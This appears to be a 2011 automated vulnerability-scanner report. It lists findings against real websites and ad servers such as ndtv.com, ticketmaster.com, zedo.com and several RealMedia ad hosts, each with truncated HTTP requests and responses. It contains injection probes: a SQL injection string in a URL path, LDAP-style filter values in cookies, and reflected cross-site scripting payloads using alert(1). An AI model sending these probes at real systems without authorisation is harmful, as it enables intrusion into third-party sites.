HTTP/1.1 200 OK Content-Type: text/html Pragma: public Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding X-Powered-By: PHP/5.3.2-1ubuntu4.9 Content-Length: 68827 Cache-Control: max-age=569 Expires: Sun, 04 Sep 2011 03:36:33 GMT Date: Sun, 04 Sep 2011 03:27:04 GMT Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... <a href="http://www.ndtv.com <li><a href="http://www.ndtv.com <li><a href="http://www.ndtv.com <li><a href="http://www.ndtv.com <li><a href="http://www.ndtv.com </ul> </div> <div class="clr"></div> <div class="also_see_n"> <a class="prev prev_browse left"></a> <div class="scrollable"> <div class="items"> <div class="item"> <a href="/video/player/news <img src="http://drop.ndtv.com <span>Mumbai airport's main runway shut till 11 pm, ...</span> </a> </div> <div class="item"> <a href="/video/player/news ...[SNIP]... |
GET /article/india17974436'%20or%201%3d2-- Host: www.ndtv.com Proxy-Connection: keep-alive Referer: http://www.ndtv.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: OAS_SC1=1315103177650; __utma=165355488 |
HTTP/1.1 200 OK Content-Type: text/html Pragma: public Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding X-Powered-By: PHP/5.3.2-1ubuntu4.9 Content-Length: 68797 Cache-Control: max-age=600 Expires: Sun, 04 Sep 2011 03:37:05 GMT Date: Sun, 04 Sep 2011 03:27:05 GMT Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... <a href="http://www.ndtv.com <li><a href="http://www.ndtv.com <li><a href="http://www.ndtv.com <li><a href="http://www.ndtv.com <li><a href="http://www.ndtv.com </ul> </div> <div class="clr"></div> <div class="also_see_n"> <a class="prev prev_browse left"></a> <div class="scrollable"> <div class="items"> <div class="item"> <a href="/video/player/news <img src="http://drop.ndtv.com <span>Mumbai airport's main runway shut till 11 pm, ...</span> </a> </div> <div class="item"> <a href="/video/player/news ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.ndtv.com |
Path: | /article/india/turkish |
GET /article/india/turkish Host: www.ndtv.com Proxy-Connection: keep-alive Referer: http://www.ndtv.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: OAS_SC1=1315103177650; __utma=165355488 |
HTTP/1.1 200 OK Content-Type: text/html Pragma: public Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding X-Powered-By: PHP/5.3.2-1ubuntu4.9 Content-Length: 68778 Cache-Control: max-age=548 Expires: Sun, 04 Sep 2011 03:35:51 GMT Date: Sun, 04 Sep 2011 03:26:43 GMT Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... <a href="http://www.ndtv.com <li><a href="http://www.ndtv.com <li><a href="http://www.ndtv.com <li><a href="http://www.ndtv.com <li><a href="http://www.ndtv.com </ul> </div> <div class="clr"></div> <div class="also_see_n"> <a class="prev prev_browse left"></a> <div class="scrollable"> <div class="items"> <div class="item"> <a href="/video/player/news <img src="http://drop.ndtv.com <span>Mumbai airport's main runway shut till 11 pm, ...</span> </a> </div> <div class="item"> <a href="/video/player/news ...[SNIP]... |
GET /article/india/turkish Host: www.ndtv.com Proxy-Connection: keep-alive Referer: http://www.ndtv.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: OAS_SC1=1315103177650; __utma=165355488 |
HTTP/1.1 200 OK Content-Type: text/html Pragma: public Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding X-Powered-By: PHP/5.3.2-1ubuntu4.9 Content-Length: 68808 Cache-Control: max-age=600 Expires: Sun, 04 Sep 2011 03:36:44 GMT Date: Sun, 04 Sep 2011 03:26:44 GMT Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... <a href="http://www.ndtv.com <li><a href="http://www.ndtv.com <li><a href="http://www.ndtv.com <li><a href="http://www.ndtv.com <li><a href="http://www.ndtv.com </ul> </div> <div class="clr"></div> <div class="also_see_n"> <a class="prev prev_browse left"></a> <div class="scrollable"> <div class="items"> <div class="item"> <a href="/video/player/news <img src="http://drop.ndtv.com <span>Mumbai airport's main runway shut till 11 pm, ...</span> </a> </div> <div class="item"> <a href="/video/player/news ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.networkad |
Path: | /managing/optout_results |
POST /managing/optout_results Host: www.networkadvertising Proxy-Connection: keep-alive Referer: http://www.networkad Content-Length: 873 Cache-Control: max-age=0 Origin: http://www.networkad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Content-Type: application/x-www-form Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASPSESSIONIDSASBDATQ optThis=1&optThis=2 ...[SNIP]... |
HTTP/1.1 200 OK Connection: close Date: Sun, 04 Sep 2011 11:42:04 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET cache-control: private pragma: no-cache Content-Type: text/html Expires: Sat, 03 Sep 2011 11:42:04 GMT Cache-control: no-cache <html> <head> <title> Welcome to Network Advertising Initiative </title> <link rel = stylesheet href = "../library/nai <script src="http://ww ...[SNIP]... <img src=http://optout.imiclk ...[SNIP]... |
POST /managing/optout_results Host: www.networkadvertising Proxy-Connection: keep-alive Referer: http://www.networkad Content-Length: 873 Cache-Control: max-age=0 Origin: http://www.networkad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Content-Type: application/x-www-form Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASPSESSIONIDSASBDATQ optThis=1&optThis=2 ...[SNIP]... |
HTTP/1.1 200 OK Connection: close Date: Sun, 04 Sep 2011 11:42:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET cache-control: private pragma: no-cache Content-Type: text/html Expires: Sat, 03 Sep 2011 11:42:04 GMT Cache-control: no-cache <html> <head> <title> Welcome to Network Advertising Initiative </title> <link rel = stylesheet href = "../library/nai <script src="http://ww ...[SNIP]... <img src=http://optout.imiclk ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.ticketmaster |
Path: | /Sporting-Kansas-City |
GET /Sporting-Kansas-City Host: www.ticketmaster.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 503 Service Unavailable Server: Apache X-TM-GTM-Origin: tmol-us-els1 Vary: Cookie,Accept-Encoding Last-Modified: Sat, 03 Sep 2011 06:20:35 GMT ETag: "a420-79c9f2c0" Content-Length: 42016 Content-Type: text/html; charset=utf-8 Date: Sun, 04 Sep 2011 04:44:33 GMT Connection: close Set-Cookie: GEO_OMN=ba; path=/; domain=.ticketmaster.com Set-Cookie: NEWSEARCH=1; path=/; domain=.ticketmaster.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns= ...[SNIP]... |
GET /Sporting-Kansas-City Host: www.ticketmaster.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: Apache X-TM-GTM-Origin: tmol-us-ash2 P3P: policyref="/w3c/tmol/p3p Content-Type: text/html; charset=utf-8 Expires: Thu, 1 Jan 1970 00:00:00 GMT Date: Sun, 04 Sep 2011 04:44:33 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: GEO_OMN=ba; path=/; domain=.ticketmaster.com Set-Cookie: NEWSEARCH=1; path=/; domain=.ticketmaster.com Set-Cookie: NDMA=261; path=/; domain=.ticketmaster.com Set-Cookie: BRAND=; path=/; domain=.ticketmaster.com; expires=Thu Jan 1 00:00:00 1970 Set-Cookie: ORIGIN=; path=/; domain=.ticketmaster.com; expires=Thu Jan 1 00:00:00 1970 Content-Length: 353895 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://trk.tidaltv.com |
Path: | /trace.axd |
GET /trace.axd HTTP/1.0 Host: trk.tidaltv.com |
HTTP/1.1 200 OK Connection: close Date: Sun, 04 Sep 2011 03:21:33 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 4.0.30319 p3p: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV" Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 9761 <html> <head> <style type="text/css"> span.tracecontent b { color:white } span.tracecontent { background-color:white; color:black;font: 10pt verdana, arial; } span.tracecontent table { clear:left ...[SNIP]... <body> <span class="tracecontent"> <table cellspacing="0" cellpadding="0" width="100%"> ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://ads.masslive.com |
Path: | /RealMedia/ads/adstream |
GET /RealMedia/ads/adstream Host: ads.masslive.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://dis.sv.us.criteo Cookie: crtg=1 |
HTTP/1.1 302 Found Date: Sun, 04 Sep 2011 04:02:44 GMT Server: Apache/2.0.52 (CentOS) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p Set-Cookie: d50338daf3e58a8e)(sn=*=1; expires=Tue, 04-Oct-11 04:02:44 GMT; path=/; domain=.masslive.com Content-Type: text/plain; charset=UTF-8 Location: /RealMedia/ads/Creatives nnCoection: close Content-Length: 0 Set-Cookie: NSC_mc-pbt-qspe-ef |
GET /RealMedia/ads/adstream Host: ads.masslive.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://dis.sv.us.criteo Cookie: crtg=1 |
HTTP/1.1 302 Found Date: Sun, 04 Sep 2011 04:02:45 GMT Server: Apache/2.0.52 (CentOS) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p Set-Cookie: d50338daf3e58a8e)!(sn=*=1 Content-Type: text/plain; charset=UTF-8 Location: /RealMedia/ads/Creatives Cneonction: close Content-Length: 0 Set-Cookie: NSC_mc-pbt-qspe-ef |
Severity: | High |
Confidence: | Tentative |
Host: | http://ads.mlive.com |
Path: | /RealMedia/ads/adstream |
GET /RealMedia/ads/adstream Host: ads.mlive.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://dis.sv.us.criteo Cookie: crtg=1 |
HTTP/1.1 302 Found Date: Sun, 04 Sep 2011 04:02:54 GMT Server: Apache/2.0.52 (CentOS) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p Set-Cookie: e3ef65172939bcb1)(sn=*=1; expires=Tue, 04-Oct-11 04:02:54 GMT; path=/; domain=.mlive.com Content-Type: text/plain; charset=UTF-8 Location: /RealMedia/ads/Creatives Cneonction: close Content-Length: 0 Set-Cookie: NSC_mc-pbt-qspe-ef |
GET /RealMedia/ads/adstream Host: ads.mlive.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://dis.sv.us.criteo Cookie: crtg=1 |
HTTP/1.1 302 Found Date: Sun, 04 Sep 2011 04:02:56 GMT Server: Apache/2.0.52 (CentOS) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p Set-Cookie: e3ef65172939bcb1)!(sn=*=1 Content-Type: text/plain; charset=UTF-8 Location: /RealMedia/ads/Creatives nnCoection: close Content-Length: 0 Set-Cookie: NSC_mc-pbt-qspe-ef |
Severity: | High |
Confidence: | Tentative |
Host: | http://ads.oregonlive.com |
Path: | /RealMedia/ads/adstream |
GET /RealMedia/ads/adstream Host: ads.oregonlive.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://dis.sv.us.criteo Cookie: crtg=1 |
HTTP/1.1 302 Found Date: Sun, 04 Sep 2011 04:02:01 GMT Server: Apache/2.0.52 (CentOS) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p Set-Cookie: da535e840f4ff729)(sn=*=1; expires=Tue, 04-Oct-11 04:02:01 GMT; path=/; domain=.oregonlive.com Content-Type: text/plain; charset=UTF-8 Location: /RealMedia/ads/Creatives nnCoection: close Content-Length: 0 Set-Cookie: NSC_mc-pbt-qspe-ef |
GET /RealMedia/ads/adstream Host: ads.oregonlive.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://dis.sv.us.criteo Cookie: crtg=1 |
HTTP/1.1 302 Found Date: Sun, 04 Sep 2011 04:02:02 GMT Server: Apache/2.0.52 (CentOS) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p Set-Cookie: da535e840f4ff729)!(sn=*=1 Content-Type: text/plain; charset=UTF-8 Location: /RealMedia/ads/Creatives Cneonction: close Content-Length: 0 Set-Cookie: NSC_mc-pbt-qspe-ef |
Severity: | High |
Confidence: | Tentative |
Host: | http://oas.guardian.co.uk |
Path: | /adstream.cap/b181bae0 |
GET /adstream.cap/b181bae0 Host: oas.guardian.co.uk User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://dis.sv.us.criteo |
HTTP/1.1 302 Found Date: Sun, 04 Sep 2011 04:00:54 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p Set-Cookie: 8dbd5612db703933)(sn=*=1; expires=Tue, 04-Oct-11 04:00:54 GMT; path=/; domain=.guardian.co.uk Location: /RealMedia/ads/Creatives Connection: close Content-Length: 0 Content-Type: text/plain |
GET /adstream.cap/b181bae0 Host: oas.guardian.co.uk User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://dis.sv.us.criteo |
HTTP/1.1 302 Found Date: Sun, 04 Sep 2011 04:00:54 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p Set-Cookie: 8dbd5612db703933)!(sn=*=1 Location: /RealMedia/ads/Creatives Connection: close Content-Length: 0 Content-Type: text/plain |
Severity: | High |
Confidence: | Tentative |
Host: | http://oasc12.247rea |
Path: | /RealMedia/ads/adstream |
GET /RealMedia/ads/adstream Host: oasc12.247realmedia.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://dis.sv.us.criteo Cookie: OAX=Mhd7ak5JOcoADoVu; NSC_d12efm_qppm_iuuq |
HTTP/1.1 302 Found Date: Sun, 04 Sep 2011 04:00:12 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p Set-Cookie: 1aa9d7b3bcb1543a)(sn=*=1; expires=Tue, 04-Oct-11 04:00:12 GMT; path=/; domain=.247realmedia.com Location: /RealMedia/ads/Creatives Connection: close Content-Length: 0 Content-Type: text/plain |
GET /RealMedia/ads/adstream Host: oasc12.247realmedia.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://dis.sv.us.criteo Cookie: OAX=Mhd7ak5JOcoADoVu; NSC_d12efm_qppm_iuuq |
HTTP/1.1 302 Found Date: Sun, 04 Sep 2011 04:00:13 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p Set-Cookie: 1aa9d7b3bcb1543a)!(sn=*=1 Location: /RealMedia/ads/Creatives Connection: close Content-Length: 0 Content-Type: text/plain |
Severity: | High |
Confidence: | Tentative |
Host: | http://pixel.quantserve |
Path: | /optout_set |
GET /optout_set?s=nai&nocache Host: pixel.quantserve.com Proxy-Connection: keep-alive Referer: http://www.networkad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: mc=4e5e6725-891ad-f8693 |
HTTP/1.1 302 Found Connection: close Set-Cookie: qoo=OPT_OUT; expires=Wed, 01-Sep-2021 11:15:15 GMT; path=/; domain=.quantserve.com P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV" Location: /optout_verify?s=nai Cache-Control: private, no-cache, no-store, proxy-revalidate Pragma: no-cache Expires: Fri, 04 Aug 1978 12:00:00 GMT Content-Length: 0 Date: Sun, 04 Sep 2011 11:15:15 GMT Server: QS |
GET /optout_set?s=nai&nocache Host: pixel.quantserve.com Proxy-Connection: keep-alive Referer: http://www.networkad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: mc=4e5e6725-891ad-f8693 |
HTTP/1.1 302 Found Connection: close Set-Cookie: qoo=OPT_OUT; expires=Wed, 01-Sep-2021 11:15:15 GMT; path=/; domain=.quantserve.com P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV" Location: /optout_verify?s=nai Cache-Control: private, no-cache, no-store, proxy-revalidate Pragma: no-cache Expires: Fri, 04 Aug 1978 12:00:00 GMT Content-Length: 0 Date: Sun, 04 Sep 2011 11:15:15 GMT Server: QS |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.networkad |
Path: | /managing/optout_results |
POST /managing/optout_results Host: www.networkadvertising Proxy-Connection: keep-alive Referer: http://www.networkad Content-Length: 873 Cache-Control: max-age=0 Origin: http://www.networkad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Content-Type: application/x-www-form Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASPSESSIONIDSASBDATQ optThis=1&optThis=2 ...[SNIP]... s=24&optThis=25&optThis ...[SNIP]... |
HTTP/1.1 200 OK Connection: close Date: Sun, 04 Sep 2011 11:28:32 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET cache-control: private pragma: no-cache Content-Type: text/html Expires: Sat, 03 Sep 2011 11:28:32 GMT Cache-control: no-cache <html> <head> <title> Welcome to Network Advertising Initiative </title> <link rel = stylesheet href = "../library/nai <script src="http://ww ...[SNIP]... <img src=http://optout.imiclk ...[SNIP]... |
POST /managing/optout_results Host: www.networkadvertising Proxy-Connection: keep-alive Referer: http://www.networkad Content-Length: 873 Cache-Control: max-age=0 Origin: http://www.networkad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Content-Type: application/x-www-form Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASPSESSIONIDSASBDATQ optThis=1&optThis=2 ...[SNIP]... s=24&optThis=25&optThis ...[SNIP]... |
HTTP/1.1 200 OK Connection: close Date: Sun, 04 Sep 2011 11:28:32 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET cache-control: private pragma: no-cache Content-Type: text/html Expires: Sat, 03 Sep 2011 11:28:32 GMT Cache-control: no-cache <html> <head> <title> Welcome to Network Advertising Initiative </title> <link rel = stylesheet href = "../library/nai <script src="http://ww ...[SNIP]... <img src=http://optout.imiclk ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://d7.zedo.com |
Path: | /bar/v16-504/d8/jsc/fm.js |
GET /bar/v16-504/d8/jsc/fm.js Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://www.dnaindia.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ZFFBbh=977B826,20|121_977 |
GET /bar/v16-504/d8/jsc/fm.js Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://www.dnaindia.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ZFFBbh=977B826,20|121_977 |
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=1185:5da07'-alert(1) Set-Cookie: FFcat=1185,589,14:305,825 Set-Cookie: FFad=29:None;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path ETag: "4368e0d-8952-4aa4df Vary: Accept-Encoding P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=171 Expires: Sun, 04 Sep 2011 02:34:38 GMT Date: Sun, 04 Sep 2011 02:31:47 GMT Content-Length: 4639 Connection: close // Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved. var y10=new Image(); var zzD=window.document; if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=76;var zzPat='5da07'-alert(1)- if(typeof zzStr=='undefined'){ var zzStr="q=5da07'-alert(1)- if(zzuid=='unkn ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://d7.zedo.com |
Path: | /bar/v16-504/d8/jsc/fm.js |
GET /bar/v16-504/d8/jsc/fm.js Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://www.dnaindia.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ZFFBbh=977B826,20|121_977 |
GET /bar/v16-504/d8/jsc/fm.js Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://www.dnaindia.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ZFFBbh=977B826,20|121_977 |
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=1185:3bfed"-alert(1) Set-Cookie: FFcat=1185,589,14:305,825 Set-Cookie: FFad=21:None;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path ETag: "4368e0d-8952-4aa4df Vary: Accept-Encoding P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=172 Expires: Sun, 04 Sep 2011 02:34:38 GMT Date: Sun, 04 Sep 2011 02:31:46 GMT Content-Length: 4661 Connection: close // Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved. var y10=new Image(); var zzD=window.document; if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=76;var zzPat='3bfed"-alert(1)- if(typeof zzStr=='undefined'){ var zzStr="q=3bfed"-alert(1)- if(zzuid=='unknown')zzuid var zzhasAd=undefined; ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ads.masslive.com |
Path: | /RealMedia/ads/adstream |
GET /RealMedia/ads/adstream Host: ads.masslive.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://dis.sv.us.criteo Cookie: crtg=1 |
HTTP/1.1 302 Found Date: Sun, 04 Sep 2011 04:01:56 GMT Server: Apache/2.0.52 (CentOS) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p Set-Cookie: 64faf c9ed964d708=1; expires=Tue, 04-Oct-11 04:01:56 GMT; path=/; domain=.masslive.com Content-Type: text/plain; charset=UTF-8 Location: /RealMedia/ads/Creatives nnCoection: close Content-Length: 0 Set-Cookie: NSC_mc-pbt-qspe-ef |
Severity: | High |
Confidence: | Certain |
Host: | http://ads.masslive.com |
Path: | /RealMedia/ads/adstream |
GET /RealMedia/ads/adstream Host: ads.masslive.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://dis.sv.us.criteo Cookie: crtg=1 |
